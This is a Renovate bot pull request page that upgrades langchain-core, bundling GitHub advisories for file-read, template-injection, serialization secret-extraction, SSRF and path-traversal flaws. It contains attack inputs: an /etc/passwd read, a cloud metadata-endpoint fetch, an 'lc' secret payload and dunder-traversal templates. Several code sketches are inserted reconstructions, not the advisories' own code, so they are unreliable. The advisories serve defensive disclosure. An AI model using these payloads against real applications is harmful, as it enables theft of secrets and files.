chore(deps): update dependency langchain-core to v1 [security] - autoclosed #153
Closed
renovate-bot wants to merge 1 commit into googleapis:main from
Conversation
/gcbrun
This PR contains the following updates:
| Package | Change |
| --- | --- |
| langchain-core | >=0.1.1, <1.0.0 → >=1.2.22, <1.2.23 |
| langchain-core | ==0.2.31 → ==1.2.22 |

langchain-core allows unauthorized users to read arbitrary files from the host file system
CVE-2024-10940 / GHSA-5chr-fjjv-38qv
More information
Details
A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate objects (and by extension langchain_core.prompts.ChatPromptTemplate objects) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead to the exposure of sensitive information.
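The advisory's example code was not captured in this page; the following is a minimal sketch of the reported issue on affected versions, with the path key and variable names assumed for illustration:

```python
# Minimal sketch (affected versions only): a user-controlled input variable
# ends up as a local file path inside an image prompt block.
from langchain_core.prompts import ChatPromptTemplate

prompt = ChatPromptTemplate.from_messages(
    [("human", [{"type": "image_url", "image_url": {"path": "{user_path}"}}])]
)
# A user-supplied filesystem path is read from the server when formatting:
messages = prompt.format_messages(user_path="/etc/passwd")
```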
Severity
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

References
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates
CVE-2025-65106 / GHSA-6qv9-48xg-fc7f
More information
Details
Context
A template injection vulnerability exists in LangChain's prompt template system that allows attackers to access Python object internals through template syntax. This vulnerability affects applications that accept untrusted template strings (not just template variables) in ChatPromptTemplate and related prompt template classes.

Templates allow attribute access (.) and indexing ([]) but not method invocation (()). The combination of attribute access and indexing may enable exploitation depending on which objects are passed to templates. When template variables are simple strings (the common case), the impact is limited. However, when using MessagesPlaceholder with chat message objects, attackers can traverse through object attributes and dictionary lookups (e.g., __globals__) to reach sensitive data such as environment variables.

The vulnerability specifically requires that applications accept template strings (the structure) from untrusted sources, not just template variables (the data). Most applications either do not use templates or else use hardcoded templates and are not vulnerable.
Affected Components
- Package: langchain-core
- F-string templates (template_format="f-string") - Vulnerability fixed
- Mustache templates (template_format="mustache") - Defensive hardening
- Jinja2 templates (template_format="jinja2") - Defensive hardening

Impact
Attackers who can control template strings (not just template variables) can:
- Traverse object attributes and dictionary lookups to reach Python internals (e.g., __class__, __globals__)
- Potentially reach sensitive data such as environment variables

Attack Vectors
1. F-string Template Injection
Before Fix:
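The original snippet was lost in extraction; a minimal sketch of the pre-fix behavior, with the payload and variable names assumed for illustration:

```python
# Pre-fix f-string vector: the template STRING itself is attacker-supplied;
# attribute traversal was accepted and later evaluated during formatting.
from langchain_core.prompts import PromptTemplate

malicious = "{msg.__class__.__init__.__globals__}"  # hypothetical payload
prompt = PromptTemplate.from_template(malicious, template_format="f-string")
# prompt.format(msg=...) would evaluate the traversal on unpatched versions.
```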
2. Mustache Template Injection
Before Fix:
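Again the snippet was lost; a hedged sketch of the mustache vector, assuming an attacker-supplied template:

```python
# Pre-hardening mustache vector: dotted names fell back to getattr(),
# exposing object attributes to the template.
from langchain_core.prompts import PromptTemplate

malicious = "{{msg.__class__}}"  # hypothetical payload
prompt = PromptTemplate.from_template(malicious, template_format="mustache")
```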
3. Jinja2 Template Injection
Before Fix:
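A hedged sketch of the Jinja2 vector under the same assumption (untrusted template string):

```python
# Pre-hardening jinja2 vector: the sandbox blocked dunder attributes but
# permitted ordinary attribute and method access on objects passed in.
from langchain_core.prompts import PromptTemplate

malicious = "{{ msg.dict() }}"  # hypothetical payload reaching a method
prompt = PromptTemplate.from_template(malicious, template_format="jinja2")
```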
Root Cause
- F-string: Used string.Formatter().parse() to extract variable names from template strings. This method returns the complete field expression, including attribute access syntax, so templates with attribute access (e.g., {obj.__class__.__name__} or {obj.method.__globals__[os]}) were accepted and subsequently evaluated during formatting. While f-string templates do not support method calls with (), they do support [] indexing, which could allow traversal through dictionaries like __globals__ to reach sensitive objects.
- Mustache: Used getattr() as a fallback to support accessing attributes on objects (e.g., on a User object). However, we decided to restrict this to simpler primitives that subclass dict, list, and tuple types as defensive hardening, since untrusted templates could exploit attribute access to reach internal properties like __class__ on arbitrary objects.
- Jinja2: SandboxedEnvironment blocks dunder attributes (e.g., __class__) but permits access to other attributes and methods on objects. While Jinja2 templates in LangChain are typically used with trusted template strings, as a defense-in-depth measure, we've restricted the environment to block all attribute and method access on objects passed to templates.
Who Is Affected?
High Risk Scenarios
You are affected if your application:
Example vulnerable code:
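The advisory's code sample was stripped here; a hedged sketch of the high-risk pattern, with the helper name purely hypothetical:

```python
# HIGH-RISK pattern: the template string (structure) comes from an
# untrusted user and is later formatted with rich objects.
from langchain_core.prompts import ChatPromptTemplate


def get_user_supplied_template() -> str:
    # Placeholder for untrusted input, e.g. a request body field.
    return "{msg.__class__}"


prompt = ChatPromptTemplate.from_template(get_user_supplied_template())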
Low/No Risk Scenarios
You are NOT affected if:
Example safe code:
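The safe sample was likewise stripped; a minimal sketch of the unaffected pattern:

```python
# Safe pattern: hardcoded template; only variable VALUES are user-controlled.
from langchain_core.prompts import ChatPromptTemplate

prompt = ChatPromptTemplate.from_template("Summarize this text: {text}")
messages = prompt.format_messages(text="any untrusted user data")
```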
The Fix
F-string Templates
F-string templates had a clear vulnerability where attribute access syntax was exploitable. We've added strict validation to prevent this:
- Templates containing attribute access or indexing (e.g., {obj.attr}, {obj[0]}, or {obj.__class__}) are rejected
- Only simple variable names (e.g., {variable_name}) are accepted

Mustache Templates (Defensive Hardening)
As defensive hardening, we've restricted what Mustache templates support to reduce the attack surface:
- Replaced the getattr() fallback with strict type checking
- Lookups are restricted to dict, list, and tuple types

Jinja2 Templates (Defensive Hardening)
As defensive hardening, we've significantly restricted Jinja2 template capabilities:
- Introduced a _RestrictedSandboxedEnvironment that blocks ALL attribute/method access
- Raises SecurityError on any attribute access attempt

Important Recommendation: Due to the expressiveness of Jinja2 and the difficulty of fully sandboxing it, we recommend reserving Jinja2 templates for trusted sources only. If you need to accept template strings from untrusted users, use f-string or mustache templates with the new restrictions instead.
While we've hardened the Jinja2 implementation, the nature of templating engines makes comprehensive sandboxing challenging. The safest approach is to only use Jinja2 templates when you control the template source.
Important Reminder: Many applications do not need prompt templates. Templates are useful for variable substitution and dynamic logic (if statements, loops, conditionals). However, if you're building a chatbot or conversational application, you can often work directly with message objects (e.g.,
HumanMessage, AIMessage, ToolMessage) without templates. Direct message construction avoids template-related security concerns entirely.

Remediation
Immediate Actions
- Upgrade langchain-core

Best Practices
- Prefer direct message construction (HumanMessage, AIMessage, etc.) without templates

Update: Jinja2 Restrictions Reverted
The Jinja2 hardening introduced in the initial patch has been reverted as of
langchain-core 1.1.3. The restriction was not addressing a direct vulnerability but was part of broader defensive hardening. In practice, it significantly limited legitimate Jinja2 usage and broke existing templates. Since Jinja2 is intended to be used only with trusted template sources, the original behavior has been restored. Users should continue to avoid accepting untrusted template strings when using Jinja2, but no security issue exists with trusted templates.

Severity
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

References
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs
CVE-2025-68664 / GHSA-c67j-w6g6-q2cm
More information
Details
Summary
A serialization injection vulnerability exists in LangChain's
dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.

Attack surface
The core vulnerability was in
dumps() and dumpd(): these functions failed to escape user-controlled dictionaries containing 'lc' keys. When this unescaped data was later deserialized via load() or loads(), the injected structures were treated as legitimate LangChain objects rather than plain user data.

This escaping bug enabled several attack vectors:
- Injection through free-form fields such as metadata, additional_kwargs, or response_metadata
- Instantiation of any Serializable subclass, but only within the pre-approved trusted namespaces (langchain_core, langchain, langchain_community). This includes classes with side effects in __init__ (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.

Security hardening
This patch fixes the escaping bug in
dumps() and dumpd() and introduces new restrictive defaults in load() and loads(): allowlist enforcement via allowed_objects="core" (restricted to serialization mappings), secrets_from_env changed from True to False, and default Jinja2 template blocking via init_validator. These are breaking changes for some use cases.

Who is affected?
Applications are vulnerable if they:
astream_events(version="v1")— The v1 implementation internally uses vulnerable serialization. Note:astream_events(version="v2")is not vulnerable.Runnable.astream_log()— This method internally uses vulnerable serialization for streaming outputs.dumps()ordumpd()on untrusted data, then deserialize withload()orloads()— Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains'lc'key structures.load()orloads()— Directly deserializing untrusted data that may contain injected'lc'structures.RunnableWithMessageHistory— Internal serialization in message history handling.InMemoryVectorStore.load()to deserialize untrusted documents.langchain-communitycaches.hub.pull.StringRunEvaluatorChainon untrusted runs.create_lc_storeorcreate_kv_docstorewith untrusted documents.MultiVectorRetrieverwith byte stores containing untrusted documents.LangSmithRunChatLoaderwith runs containing untrusted messages.The most common attack vector is through LLM response fields like
additional_kwargs or response_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.

Impact
Attackers who control serialized data can extract environment variable secrets by injecting
{"lc": 1, "type": "secret", "id": ["ENV_VAR"]}to load environment variables during deserialization (whensecrets_from_env=True, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.Key severity factors:
- Secret extraction requires secrets_from_env=True (the old default)
- Fields like additional_kwargs can be controlled via prompt injection

Exploit example
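The advisory's exploit listing was not captured here; a hedged sketch using the payload shape the advisory gives, with surrounding names illustrative:

```python
# Sketch: attacker-controlled metadata survives dumps()/loads() as a live
# "secret" structure on vulnerable versions (payload shape per advisory).
import os
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

os.environ["API_KEY"] = "super-secret"
msg = AIMessage(
    content="hi",
    additional_kwargs={"x": {"lc": 1, "type": "secret", "id": ["API_KEY"]}},
)
restored = loads(dumps(msg), secrets_from_env=True)  # old default behavior
# On unpatched versions the injected dict deserializes as the env secret.
```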
Security hardening changes (breaking changes)
This patch introduces three breaking changes to
load() and loads():

1. allowed_objects parameter (defaults to 'core'): Enforces an allowlist of classes that can be deserialized. The 'all' option corresponds to the list of objects specified in mappings.py while the 'core' option limits to objects within langchain_core. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.
2. secrets_from_env default changed from True to False: Disables automatic secret loading from the environment.
3. init_validator parameter (defaults to default_init_validator): Blocks Jinja2 templates by default.

Migration guide
No changes needed for most users
If you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like
ChatOpenAI, ChatAnthropic, etc.), your code will work without changes.

For custom classes
If you're deserializing custom classes not in the serialization mappings, add them to the allowlist:
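The migration snippet was stripped; a hedged sketch using the 'all' allowlist option documented by this advisory (consult the patch notes for explicitly listing your own classes):

```python
# Opting into the broader documented allowlist at deserialization time.
from langchain_core.load import dumps, loads
from langchain_core.messages import HumanMessage

serialized = dumps(HumanMessage(content="hello"))
restored = loads(serialized, allowed_objects="all")
```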
For Jinja2 templates
Jinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass
init_validator=None:

For secrets from environment
secrets_from_env now defaults to False. If you need to load secrets from environment variables:
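The code for both opt-outs was stripped; a hedged sketch, to be used only with data you fully trust:

```python
# Opt-outs introduced by this patch (trusted data only).
from langchain_core.load import dumps, loads
from langchain_core.messages import HumanMessage

trusted = dumps(HumanMessage(content="hi"))   # serialized data you control
obj = loads(trusted, init_validator=None)     # re-allow Jinja2 templates
obj = loads(trusted, secrets_from_env=True)   # re-allow environment secrets
```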
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

References
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages
CVE-2026-26013 / GHSA-2g6r-c272-w58r
More information
Details
Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting
Summary
The
ChatOpenAI.get_num_tokens_from_messages() method fetches arbitrary image_url values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.

Severity
Low - The vulnerability allows SSRF attacks but has limited impact due to:
Impact
An attacker who can control image URLs passed to
get_num_tokens_from_messages() can:

Note: This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).
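A hedged sketch of the trigger, with the target URL illustrative (a cloud metadata endpoint):

```python
# An untrusted image_url reaching token counting triggers a server-side
# fetch on unpatched langchain-openai (< 1.1.9).
from langchain_core.messages import HumanMessage
from langchain_openai import ChatOpenAI

llm = ChatOpenAI(model="gpt-4o")
msg = HumanMessage(content=[{
    "type": "image_url",
    "image_url": {"url": "http://169.254.169.254/latest/meta-data/", "detail": "low"},
}])
llm.get_num_tokens_from_messages([msg])  # fetches the URL to size the image
```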
Details
The vulnerable code path:
1. get_num_tokens_from_messages() processes messages containing image_url content blocks
2. For images with detail: "low", it calls _url_to_size() to fetch the image and compute token counts
3. _url_to_size() performs httpx.get(image_source) on any URL without validation
File: libs/partners/openai/langchain_openai/chat_models/base.py

Patches
The vulnerability has been patched in
langchain-openai==1.1.9 (requires langchain-core==1.2.11).

The patch adds:
- langchain_core._security._ssrf_protection.validate_safe_url() to block unsafe URLs before the httpx.get call (enabled by default)
- An allow_fetching_images=False parameter

Workarounds
If you cannot upgrade immediately:
- Validate and sanitize image_url values before passing messages to token counting or model invocation

Severity
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

References
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain Core has Path Traversal vulnerabilities in legacy
load_prompt functions
CVE-2026-34070 / GHSA-qh6h-p6c9-ff54
More information
Details
Summary
Multiple functions in
langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples).
load_prompt,load_prompt_from_config, and the.save()method on prompt classes) are undocumented legacy APIs. They are superseded by thedumpd/dumps/load/loadsserialization APIs inlangchain_core.load, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.Affected component
Package:
langchain-coreFile:
langchain_core/prompts/loading.pyAffected functions:
_load_template(),_load_examples(),_load_few_shot_prompt()Severity
High
The score reflects the file-extension constraints that limit which files can be read.
Vulnerable code paths
template_path,suffix_path,prefix_path_load_template().txtexamples(when string)_load_examples().json,.yaml,.ymlexample_prompt_path_load_few_shot_prompt().json,.yaml,.ymlNone of these code paths validated the supplied path against absolute path injection or
..traversal sequences before reading from disk.Impact
An attacker who controls or influences the prompt configuration dict can read files outside the intended directory:
.txtfiles: cloud-mounted secrets (/mnt/secrets/api_key.txt),requirements.txt, internal system prompts.json/.yamlfiles: cloud credentials (~/.docker/config.json,~/.azure/accessTokens.json), Kubernetes manifests, CI/CD configs, application settingsThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose
load_prompt_from_config().Proof of concept
Mitigation
Update
langchain-coreto >= 1.2.22.The fix adds path validation that rejects absolute paths and
..traversal sequences by default. Anallow_dangerous_paths=Truekeyword argument is available onload_prompt()andload_prompt_from_config()for trusted inputs.As described above, these legacy APIs have been formally deprecated. Users should migrate to
dumpd/dumps/load/loadsfromlangchain_core.load.Credit
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain has incomplete f-string validation in prompt templates
CVE-2026-40087 / GHSA-926x-3r5x-gfhw
More information
Details
LangChain's f-string prompt-template validation was incomplete in two respects.
First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as
PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.

Examples of the affected shape include:
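The examples themselves were stripped in extraction; a hedged illustration of the shape, with constructor usage and variable names assumed:

```python
# An f-string template containing attribute access, previously accepted
# by ImagePromptTemplate on affected versions.
from langchain_core.prompts.image import ImagePromptTemplate

tpl = ImagePromptTemplate(
    template={"url": "{user.__class__}"},  # attribute access in a placeholder
    input_variables=["user"],
)
```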
Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:
"{name:{name.__class__.__name__}}"In this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.
Affected usage
This issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.
In addition, practical impact depends on what objects are passed into template formatting:
In many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.
Applications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.
Impact
The direct issue in
DictPromptTemplate and ImagePromptTemplate allowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.
Overall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.
Fix
The fix consists of two changes.
First, LangChain now applies f-string safety validation consistently to
DictPromptTemplateandImagePromptTemplate, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.Second, LangChain now rejects nested replacement fields inside f-string format specifiers.
Concretely, LangChain validates parsed f-string fields and raises an error for:
.or[]{or}This blocks templates such as:
The fix preserves ordinary f-string formatting features such as standard format specifiers and conversions, including examples like:
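The preserved examples were also stripped; standard Python formatting features of this kind remain accepted:

```python
# Ordinary formatting still works:
"{value:.2f}"   # standard format specifier
"{name!r}"      # conversion
"{text:>20}"    # alignment/width
```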
In addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Release Notes
langchain-ai/langchain (langchain-core)
v0.1.16 (Compare Source)
What's Changed
- _load_sql_databse_chain by @B-Step62 in #19908

New Contributors
Full Changelog: langchain-ai/langchain@v0.1.15...v0.1.16
v0.1.15 (Compare Source)
What's Changed
Configuration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Never, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about these updates again.
This PR was generated by Mend Renovate. View the repository job log.